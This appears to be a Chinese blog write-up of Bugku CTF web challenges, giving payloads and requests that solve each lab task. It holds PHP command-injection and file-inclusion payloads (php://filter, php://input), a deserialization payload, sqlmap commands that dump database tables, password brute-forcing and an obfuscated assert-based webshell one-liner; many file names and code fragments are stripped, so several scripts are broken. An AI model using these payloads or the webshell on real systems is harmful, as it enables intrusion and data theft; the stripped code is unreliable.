Bugku-Web-Wp

时间:2024-11-14 08:31:52

目录

 

1.web2

2.计算器

3. web基础$_GET

4. web基础$_POST

5.矛盾

6. web3

7. 域名解析

8.你必须让他停下

9.本地包含

10.变量1

 11.web5

12.头等舱

13.网站被黑

14. 管理员系统

15.web4

 在index里

17.输入密码查看flag

18.点击一百万次

19. 备份是个好习惯

20.成绩单

21. 秋名山老司机

22.速度要快

欺骗

give up

to bugkuctf

28.前女友(SKCTF)

30 .你从哪里来

31. md5 collision(NUPT_CTF)

32.程序员本地网站

33.各种绕过

 34.web8

35.细心

36. 求getshell

INTO注入

38.这是一个神奇的登陆框

 39.多次

40.PHP_encrypt_1(ISCCCTF)


1.web2

听说聪明的人都能找到答案
http://123.206.87.240:8002/web2/

 查看源码,。。。

2.计算器

地址:http://123.206.87.240:8002/yanzhengma/

只能输入一位数

F12修改输入框长度

得到flag 

 

3. web基础$_GET

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
flagflag{bugku_get_su8kej2en}

构造payoad

http://123.206.87.240:8002/get/?what=flag

得到flag 

4. web基础$_POST

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

post传值

 

5.矛盾

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

不是数字,而且等于1,比较容易想到的是%00,%20截断

http://123.206.87.240:8002/get/?num=1%00
http://123.206.87.240:8002/get/?num=1%20

实际上只要1后面随便跟一个不是数字的都可以

6. web3

 不停弹窗,查看源码,

发现有点东西

#75;EY{J2sa42ahJK-HS11III&#125

Unicode转ASCII

7. 域名解析

听说把  解析到123.206.87.240 就能拿到flag

进入听说把 解析到123.206.87.240 就能拿到flag

修改hosts文件:进入C:\Windows\System32\drivers\etc的hosts在最后添加

    120.24.86.145 

访问即可

不知道为啥最近访问不了,吐槽一波,bugku运维的好懒。。。

8.你必须让他停下

进去之后你发现一张不断闪动的图片,bp抓一下包

GET /web12/ HTTP/1.1
Host: 123.206.87.240:8002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 多点了两下,就出来了

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Nov 2018 12:00:28 GMT
Content-Type: text/html
Connection: close
Content-Length: 630

<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<title>Dummy game</title>
</head>

<script language="JavaScript">
function myrefresh(){
();
}
setTimeout('myrefresh()',500); 
</script>
<body>
<center><strong>I want to play Dummy game with others£¡But I can't stop!</strong></center>
<center>Stop at panda ! u will get flag</center>
<center><div><img src=""/></div></center><br><a style="display:none">flag{dummy_game_1s_s0_popular}</a></body>

9.本地包含

地址:http://123.206.87.240:8003/
<?php 
    include ""; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); 
    show_source(__FILE__); 
?>

源码分析:

语句在服务器执行php文件之前在该文件中插入的内容

2.$_request这个变量和$_GET、$_POST一样,都属于超级全局变量,但是呢,运行时修改后者不会影响前者,反之亦然

3.以get/post等方式赋值给$a

函数把字符串当作命令直接执行,var_dump() 函数用于输出变量a的类型和值。

5.把本页代码以高亮语法显示出来

构造payload

GET传参

http://123.206.87.240:8003/?hello=file('')
file()函数的作用是读取文件,然后以数组的形式返回
http://123.206.87.240:8003/?hello=show_source(%%27)
show_source()高亮显示的值
http://123.206.87.240:8003/?hello=1);show_source(%%27);//
);把前面的命令闭合掉,show_source()函数对进行PHP语法高亮显示,//把原来命令的残余部分注释掉
show_source(%%27);就可以执行了。
http://120.24.86.145:8003/?hello=1);show_source(%%27);var_dump(3
var_dump( 输出原来命令的残余部分以及3

得到flag

POST传参

http://123.206.87.240:8003/?hello=1);include $_POST['f'];//
在POST区域:f=php://filter/convert.base64-encode/resource=

base64解码即可

总结:

攻击方式和SQL注入的payload很像:
);”负责把前面的命令闭合掉

//”负责把原来命令的残余部分注释掉

中间的那部分就是我们希望执行的命令,这是典型的“命令注入”式的攻击方式!

所以payload的格式是:
);the_command_that_you_want_to_execute//

10.变量1

http://123.206.87.240:8004/
flag In the variable ! <?php  

error_reporting(0);
include "";  //包含
highlight_file(__file__);  //高亮显示php文件
if(isset($_GET['args'])){
    $args = $_GET['args'];  //get方式获得args
    if(!preg_match("/^\w+$/",$args)){  //匹配/^\w+$/,没匹配到的话,程序结束
        die("args error!");
    } 
    eval("var_dump($$args);");  //执行var_dump()函数,
                                //$$存在文件包含漏洞,只需要给args传一个全局数组变量即可
?>

构造payload:

http://123.206.87.240:8004/?args=GLOBALS

 11.web5

JSPFUCK??????答案格式CTF{**}

http://123.206.87.240:8002/web5/

字母大写

F12发现JSPFUCK

复制代码,进入控制台,enter

12.头等舱

http://123.206.87.240:9009/

看来真的没啥了。。

bp抓下包

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 07:53:45 GMT
Content-Type: text/html
Connection: close
flag{Bugku_k8_23s_istra}: 
Content-Length: 139


<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<pre><br><br><br><br>ä»ä¹ä¹æ²¡æã<br><br>
</html>

13.网站被黑

http://123.206.87.240:8002/webshell/

这个题没技术含量但是实战中经常遇到

没技术含量 ,先御剑跑一波。。

发现http://123.206.87.240:8002/webshell/

进去看看

需要密码,bp爆破一波

密码 hack

14. 管理员系统

http://123.206.31.85:1003/

flag格式flag{}

既然是管理员系统,那么用户名就是admin

bp爆破得到密码

在bp中修改好,go

<html>
  <head>
    <title></title>
  </head>
  <body>
    <h1></h1>
    <form method="POST" autocomplete="off">
      <p>Username:
        <input type="text" name="user" >
      </p>
      <p>Password:
        <input type="password" name="pass" >
      </p>
      <p>
        <input type="submit" value="Submit"/>
        <input type="reset" value="Reset"/>
      </p>
    </form>
    <font style="color:#FF0000">
      <h3>The flag is: 85ff2ee4171396724bae20c0bd851f6b</h3>
      <br\></font\>
    </body>
  </html>
  <!-- dGVzdDEyMw== -->

发现flag,然而dGVzdDEyMw==是什么鬼

解码后test123

然后再网页中发现了这个

。。。,感觉到出题人深深的恶意

15.web4

看看源代码吧

http://123.206.87.240:8002/web4/

查看源代码

 拼接一下,然后url解码

dGVzdDEyMw==function checkSubmit(){var a=("password");if("undefined"!=typeof a){if("67d709b2b
54aa2aa648cf6e87a7114f1"==)return!0;alert("Error");();return!1}}("levelQuest").onsubmit=checkSubmit;

发现67d709b2b54aa2aa648cf6e87a7114f1,提交一下试试

 在index里

http://123.206.87.240:8005/post/

 源码

抓包

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 08:41:04 GMT
Content-Type: text/html
Connection: close
Content-Length: 105

<html>
    <title>Bugku-ctf</title>
    
<a href="./?file=">click me? no</a></html>
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 08:48:02 GMT
Content-Type: text/html
Connection: close
Content-Length: 58

<html>
    <title>Bugku-ctf</title>
    
test5</html>

啥都没有。。。

题目提示在index里,而

 

http://123.206.87.240:8005/post/?file=

一看就有问题

我们可以使用php://filter读取文件内容

构造payload

http://123.206.87.240:8005/post/?file=php://filter/read=convert.base64-encode/resource=

得到

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解码

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./?file=">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

不懂得参考

/qq_40657585/article/details/83149305

17.输入密码查看flag

http://123.206.87.240:8002/baopo/

作者:Se7en

 爆破一波

密码 13579

 这个想吐槽一下,你就不能说五位数字吗,你知道五位数的密码有多大吗。。

18.点击一百万次

http://123.206.87.240:9001/test/

hints:JavaScript

点击一百万次就可以了,这个是真的,不骗你。。。

19. 备份是个好习惯

http://123.206.87.240:8002/web16/

听说备份是个好习惯

发现md5

d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e

解码 空字符,没用

题目说备份,御剑走起来

访问.bak下载得到php文件

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

整段代码的意思是将get的两个参数中的key替换为空(这里可以用kekeyy绕过),然后对key1,key2的值进行md5加密,并进行比较,

如果md5加密的值一样而未加密的值不同,就输出flag.

构造payload

数组绕过

http://123.206.87.240:8002/web16/?kekeyy1[]=something&kekeyy2[]=anything

==比较漏洞绕过

http://123.206.87.240:8002/web16/?kekeyy1[]=md51&kekeyy2[]=md52
任选两个0e开头的md5值即可

 

20.成绩单

快来查查成绩吧
http://123.206.87.240:8002/chengjidan/

post方式注入,第一次见,代码都一样,就是写的地方不一样,hackbar不好使了,sqlmap一波

sqlmap post方式注入 :--data=DATA

-u http://123.206.87.240:8002/chengjidan/ --data="id=1" --dbs  //爆数据库

 

-u http://123.206.87.240:8002/chengjidan/ --data="id=1" -D skctf_flag --table  //爆表名

-u http://123.206.87.240:8002/chengjidan/ --data="id=1" -D skctf_flag -T fl4g --dump //爆字段

 

21. 秋名山老司机

http://123.206.87.240:8002/qiumingshan/

是不是老司机试试就知道。

 必须上脚本了

#!/usr/bin/python
# -*- coding:utf8 -

import requests
import re
url = 'http://123.206.87.240:8002/qiumingshan/'
s = ()  //获取session值,不然服务器认为是新请求
text = (url)       //获取url内容
exp = (r'(\d+[+\-*])+(\d+)',).group()  //搜索符合要求的字符
result = eval(exp)  //执行表达式
post = {'value':result}  //赋值
print((url,data=post).content) //post传值并请求url,输出文本
原来你也是老司机 Bugku{YOU_DID_IT_BY_SECOND}

Process finished with exit code 0

22.速度要快

速度要快!!!!!!

http://123.206.87.240:8002/web6/

格式KEY{xxxxxxxxxxxxxx}

bp抓下包

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Nov 2018 13:13:23 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTmpVMk5qWTE=
Content-Length: 89

</br>ææè§ä½ å¾å¿«ç¹!!!<!-- OK ,now you have to post the margin what you find -->

写脚本吧

#!/usr/bin/python
# -*- coding:utf8 -
import requests
import base64

# s = '6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogTkRFeE5UZz0='
# b = base64.b64decode(s)
# print(b)
url = 'http://123.206.87.240:8002/web6/'
s = ()  
re = (url)
key = base64.b64decode(['flag'])  //headers[]将headers格式化,要获取flag必须加‘’
print(key)
key = base64.b64decode((':')[1]) //分割字符串,获取:以后的值
print(key)
print ((url,data={'margin':key}).text) //post方式传递margin
跑的还不错,给你flag吧: MzcwMjQx
370241
KEY{111dd62fcd377076be18a}

欺骗

http://123.206.87.240:8002/web11/

答案格式:KEY{xxxxxxxx}

rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry

没看出来是啥编码,。。。

注意到ip地址里,base64

http://123.206.87.240:8002/web11/?line=&filename=a2V5cy50eHQ=

解码一哈,

仿照格式,试了一波,并且line=1

 发现代码,改line的值,可以出现其余代码,

当然也可以写脚本

#!/usr/bin/python
# -*- coding:utf8 -

import requests
s = ''
for i in range(0,100):
    url = 'http://123.206.87.240:8002/web11/?line='+str(i)+'&filename=aW5kZXgucGhw'
    s = (url)
    print 

 获得的代码

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'',

'1' =>'',

);

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='';

}

 

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>


if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='';

分析代码知,只有cookie里的margin=margin,才能访问

 伪造cookie

GET /web11/?line=&filename=a2V5cy5waHA= HTTP/1.1
Host: 123.206.87.240:8002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: margin=margin
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

返回头

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 13:45:19 GMT
Content-Type: text/html
Connection: close
Content-Length: 30

<?php $key='KEY{key_keys}'; ?>

得到flag

give up

题目肯定坏了,放弃

to bugkuctf

右键查看源码


you are not the number of bugku !   
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

 构造payload查看


Request
POST /test1/?txt=php://input&file=&password= HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

welcome to the bugkuctf
Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 14:05:58 GMT
Content-Type: text/html
Connection: close
Content-Length: 324

hello friend!<br>    
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

利用php://input 输入welcome to the bugkuctf

POST /test1/?txt=php://input&file=php://filter/read=convert.base64-encode/resource=&password= HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

welcome to the bugkuctf
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 14:09:07 GMT
Content-Type: text/html
Connection: close
Content-Length: 658

hello friend!<br>PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

利用php://filter读取文件内容

看到base64了,有点激动

解码

<?php  
  
class Flag{//  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
			echo "<br>";
		return ("good");
        }  
    }  
}  
?>

emmm,继续吧,看到file_get_contents(),文件包含,

同样的方法,看一下源码,利用php://filter读取的内容

POST /test1/?txt=php://input&file=php://filter/read=convert.base64-encode/resource=&password= HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

welcome to the bugkuctf

 

<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
		echo "涓嶈兘鐜板湪灏辩粰浣爁lag鍝�";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //  
}else{  
    echo "you are not admin ! ";  
}  
 --> 

    include($file);   
        $password = unserialize($password);  
        echo $password; 

反序列化,在password处传,

POST /test1/?txt=php://input&file=&password=O:4:"Flag":1:{s:4:"file";s:8:"";}" HTTP/1.1
Host: 123.206.87.240:8006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://123.206.87.240:8006/test1/?txt=php://input&file=&password=
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Cookie: PHPSESSID=1ebjlloqm0t413ckj4k20pfhc0g1pvib
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

welcome to the bugkuctf

 

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Nov 2018 14:33:42 GMT
Content-Type: text/html
Connection: close
Content-Length: 380

hello friend!<br>  <?php  
//flag{php_is_the_best_language}  1
?><br>good  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

得到flag,好题

26.过狗一句话

<?php 
$poc="a#s#s#e#r#t"; 
$poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
$poc_2($_GET['s']) 
?>

解释一下:

explode()用#号把$poc字符串用#打散为数组poc_1,然后拼接为字符串poc_2,也就是assert

 assert() 任意代码执行,打印当前目录

?s=var_dump(scandir(%27./%27))

访问即可

27.

28.前女友(SKCTF)

http://123.206.31.85:49162/
flag格式:SKCTF{xxxxxxxxxxxxxxxxxx}

 看源码

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

 构造payload

http://123.206.31.85:49162/?v1[]=QNKCDZO&v2[]=s878926199a&v3[]=

30 .你从哪里来

http://123.206.87.240:9009/

将Refer改为

Referer: 

31. md5 collision(NUPT_CTF)

构造payload

http://123.206.87.240:9009/?a=s878926199a

32.程序员本地网站

伪造ip头

x-forwarded-for: 127.0.0.1
x-remote-IP: 127.0.0.1
x-remote-ip: 127.0.0.1
x-client-ip: 127.0.0.1
x-client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1

 

33.各种绕过

各种绕过哟

http://123.206.87.240:8002/web7/
<?php
highlight_file('');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

} 

构造payload

http://123.206.87.240:8002/web7/?uname[]=1&id=margin
post传值:passwd[]=2

 34.web8

txt????

http://123.206.87.240:8002/web8/
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

file_get_contents()文件包含漏洞

提示说有txt文件,尝试

发现是flags,因此可以构造

http://123.206.87.240:8002/web8/?ac=flags&fn=

得到flag

35.细心

地址:http://123.206.87.240:8002/web13/

想办法变成admin

请求头 响应头啥也没有

御剑扫一波目录

 访问

http://123.206.87.240:8002/web13/

 访问一哈

 慌得一批,在下面看见get传参

又想起来提示admin

http://123.206.87.240:8002/web13/?x=admin

36. 求getshell

求getshell

http://123.206.87.240:8002/web9/

感觉是00截断,各种操作,没有用,很难受

上网搜了一波,发现是后缀名黑名单检测和类型检测

php别名:php2, php3, php4, php5, phps, pht, phtm, phtml。

Content-Type大小写绕过。

学到了,不太懂。

INTO注入

38.这是一个神奇的登陆框

http://123.206.87.240:9001/sql/

flag格式flag{}

 post方式注入

上神器sqlmap+bp

POST /sql/ HTTP/1.1
Host: 123.206.87.240:9001
Content-Length: 43
Cache-Control: max-age=0
Origin: http://123.206.87.240:9001
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://123.206.87.240:9001/sql/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

admin_name=1&admin_passwd=1&submit=GO+GO+GO

bp抓一下包,存为

python2  -r "C:\Users\ppp\Desktop\" -p admin_name --dbs

python2  -r "C:\Users\ppp\Desktop\" -p admin_name -D bugkusql1 --tables

 

 

python2  -r "C:\Users\ppp\Desktop\" -p admin_name -D bugkusql1 -T flag1 --dump

 39.多次

40.PHP_encrypt_1(ISCCCTF)

相关文章